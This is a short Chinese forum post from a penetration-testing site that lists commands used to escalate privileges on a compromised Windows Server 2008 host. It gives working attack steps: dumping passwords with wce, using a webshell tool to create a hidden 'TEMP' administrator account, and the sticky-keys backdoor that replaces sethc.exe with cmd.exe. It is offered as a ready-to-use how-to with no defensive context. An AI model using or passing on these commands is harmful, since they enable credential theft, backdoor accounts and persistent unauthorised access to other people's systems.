中国网络渗透测试联盟

标题: 提权windows 2008的几个常用命令 [打印本页]

作者: admin    时间: 2013-7-13 19:19
标题: 提权windows 2008的几个常用命令
上次提权一 windows 2008的主机,现将用到的几个命令总结如下。
1.使用wce抓取密码  直接抓密码命令wce -w

2.webshell提权要看是什么权限,如果是system权限则可以直接添加用户。否则只能通过漏洞提权了。

3.iis7.exe 工具使用命令

IIS "NET USER TEMP TEMP /ADD "

IIS "NET LOCALGROUP ADMINISTRATORS TEMP /ADD"

4.set命令
可检查系统设置情况

5.systeminfo
查看系统详细信息 这个比set和whoami都要好使

6. whoami是操作系统中用于查看当前用户权限(英语:User (computing))的命令
调用该命令时系统会输出当前用户的有效用户名

7.另外还用到了粘滞键替换的几条命令:

copy c:\windows\system32\sethc.exe c:\windows\system32\sethcbk.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe


   以上是本人的一点小总结。高手勿喷。







欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2